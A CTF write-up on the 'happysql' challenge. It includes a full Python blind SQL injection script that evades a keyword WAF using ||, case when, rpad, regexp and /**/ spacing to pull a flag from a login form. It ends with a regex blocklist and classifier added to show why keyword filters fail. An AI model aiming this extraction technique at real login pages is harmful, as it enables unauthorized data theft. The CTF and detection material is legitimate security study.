hmgctf: learning a new SQL injection trick

happysql

Pretty nasty. At first I did some fuzzing and it looked like the WAF only blocked some fairly ordinary things, each of which had a known way around it, but the further I got the stranger it became.


and, or and && are blocked, so I used || instead. Next came the substring functions such as substr; I planned to replace them with left and extract characters with ascii(left()), but then discovered that =, <, >, like and rlike are all blocked as well. Posts online say in can be used instead; I tried it and got nothing out of it, which was frustrating. After that I found lpad, regexp and benchmark still work, and then hit the really awkward problem: if is blocked too. Later I read a senior's script, which uses case when ... then ... else ... end, the SQL equivalent of if/else:

select case when (condition) then (expression 1) else (expression 2) end
```python
import re
import sys

import requests


def str_to_hex(s):
    # helper kept from the original script; not used by the loop below
    return ' '.join([hex(ord(c)).replace('0x', '') for c in s])


def hex_to_str(s):
    return ''.join([chr(i) for i in [int(b, 16) for b in s.split(' ')]])


url = "http://eci-2zej5nwlszgd868060ye.cloudeci1.ichunqiu.com/login.php"

# printable characters the extracted value may contain
charset = ''',0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"{#%&()-./:;<=>?@[\\]^_`|}~'''

flag = ""   # hex of the recovered prefix (kept for printing)
t = ""      # recovered prefix as plain text
for i in range(25, 80):
    print(i)
    for j in charset:
        # payload = "database()"  # ctf
        # payload = "select group_concat(table_name) from mysql.innodb_table_stats where database_name regexp database()"  # ctf,f1ag
        # payload = 'select b from (select 1 as b union select * from f1ag) as a'
        payload = 'select group_concat(a.1) from (select 1 union select * from f1ag) as a'
        # rpad() pins the compared length to i, regexp stands in for the blocked = / like,
        # and case ... when stands in for the blocked if(). The guessed prefix is anchored
        # with ^ and regex-escaped so that '.', '*' and friends cannot match spuriously,
        # and the pattern is hex-encoded so no quotes are needed.
        pattern = ('^' + re.escape(t + j)).encode().hex()
        data = {
            'username': ('wa123123"||case when (rpad(({}),{},1))regexp(0x{}) then 1 else 0 end#'
                         .format(payload, i, pattern)).replace(' ', '/**/'),
            'password': '123'
        }
        res = requests.post(url=url, data=data)
        if "<meta http-equiv=" in res.text:   # login succeeded, so the guess was right
            flag += hex(ord(j)).replace('0x', '')
            t += j
            print(flag, t)
            break
        elif 'injection' in res.text:        # the WAF tripped
            print('wrong')
            sys.exit()
```
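From the defender's side, the lesson of this challenge is that a keyword blocklist is only as good as its list. The following added example (mine, not the author's script) reconstructs the blocklist implied by the write-up as an assumption, normalizes the `/**/`-for-space obfuscation the script relies on, and shows that the classic payload is caught while the `||` / `case when` / `rpad` / `regexp` variant sails through, so the second set of patterns is what a detection rule would have to add.

```python
import re

# Blocklist reconstructed from the write-up's fuzzing notes (assumption: the real WAF
# rules are not shown on the page).
CHALLENGE_BLOCKLIST = [r"\band\b", r"\bor\b", r"&&", r"\bsubstr", r"=", r"<", r">",
                       r"\blike\b", r"\brlike\b", r"\bif\b"]

# Substitutes the write-up uses for the blocked constructs.
BYPASS_TOKENS = [r"\|\|", r"\bleft\s*\(", r"\b[lr]pad\s*\(", r"\bregexp\b",
                 r"\bbenchmark\s*\(", r"\bcase\s+when\b"]


def normalize(s):
    """Undo the obfuscation the script relies on: /**/ comments used as spaces, case."""
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).lower()


def blocklist_hits(payload):
    """Patterns from the challenge blocklist that match the normalized input."""
    n = normalize(payload)
    return [p for p in CHALLENGE_BLOCKLIST if re.search(p, n)]


def bypass_hits(payload):
    """Patterns for the write-up's substitutes that match the normalized input."""
    n = normalize(payload)
    return [p for p in BYPASS_TOKENS if re.search(p, n)]


def classify(payload):
    """'blocked' if the reconstructed WAF would catch it, 'suspicious' if only the
    substitute constructs are present, else 'clean'."""
    if blocklist_hits(payload):
        return "blocked"
    if bypass_hits(payload):
        return "suspicious"
    return "clean"


# Constructed sample login inputs (not captured traffic).
SAMPLES = {
    "classic": 'admin" and if(ascii(substr(database(),1,1))=99,1,0)#',
    "writeup": ('wa123123"||case/**/when/**/(rpad((select/**/group_concat(a.1)/**/from/**/'
                '(select/**/1/**/union/**/select/**/*/**/from/**/f1ag)/**/as/**/a),25,1))'
                'regexp(0x5e63)/**/then/**/1/**/else/**/0/**/end#'),
    "benign": "alice",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, classify(value), blocklist_hits(value) or bypass_hits(value))
```

The real fix is parameterized queries on the login handler; the classifier only shows why pattern lists alone keep losing this race.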